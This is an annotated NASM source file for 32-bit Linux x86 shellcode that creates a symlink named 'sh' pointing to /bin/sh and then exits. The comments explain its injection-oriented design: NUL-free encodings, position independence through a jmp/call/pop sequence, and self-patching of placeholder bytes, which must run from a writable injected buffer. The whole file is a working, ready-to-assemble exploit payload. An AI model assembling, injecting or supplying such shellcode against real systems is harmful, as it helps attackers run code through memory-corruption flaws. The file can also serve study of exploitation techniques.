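; Linux/x86 (32-bit) shellcode: symlink("/bin/sh", "sh"); exit(0)
;
; Syntax: NASM, Intel operand order. Target: Linux i386, `int 0x80` syscall
; ABI (eax = syscall number, ebx/ecx = first and second argument).
;
; Position independence: the jmp -> call -> pop sequence yields the address
; of the trailing string without any absolute address, and none of the
; instruction encodings below contains a NUL byte (the `mov al, imm8`
; forms and 8-bit displacements are chosen for exactly that reason).
;
; The string is carried as '/bin/sh#sh#' and the two '#' placeholders are
; overwritten with NUL at run time. Those stores hit the bytes that follow
; `call doit`, i.e. the payload patches itself: it must be executing from
; writable memory (an injected buffer, a stack/heap copy). Assembled into a
; read-only .text section the two `mov byte [...]` stores will fault.

BITS 32

SYS_EXIT        equ 1
SYS_SYMLINK     equ 83

OLDPATH_NUL     equ 7                   ; offset of the '#' that ends "/bin/sh"
NEWPATH         equ 8                   ; offset of "sh"
NEWPATH_NUL     equ 10                  ; offset of the '#' that ends "sh"

        jmp     short callit

doit:
        pop     esi                             ; esi = &"/bin/sh#sh#" (pushed by `call`)
        xor     eax, eax                        ; eax = 0; al = 0 is the terminator byte
        mov     byte [esi + OLDPATH_NUL], al    ; "/bin/sh#" -> "/bin/sh\0"
        mov     byte [esi + NEWPATH_NUL], al    ; "sh#"      -> "sh\0"

        ; symlink(oldpath = "/bin/sh", newpath = "sh")
        mov     al, SYS_SYMLINK                 ; upper bytes of eax are already 0
        mov     ebx, esi                        ; ebx = oldpath
        lea     ecx, [esi + NEWPATH]            ; ecx = newpath
        int     0x80

        ; exit(0). Without this the code falls through into `callit`,
        ; re-enters doit and re-issues symlink (failing with EEXIST) forever.
        xor     eax, eax
        mov     al, SYS_EXIT
        xor     ebx, ebx                        ; exit status 0
        int     0x80

callit:
        call    doit                            ; pushes the address of the string below
        db      '/bin/sh#sh#'                   ; '#' bytes are patched to NUL in doit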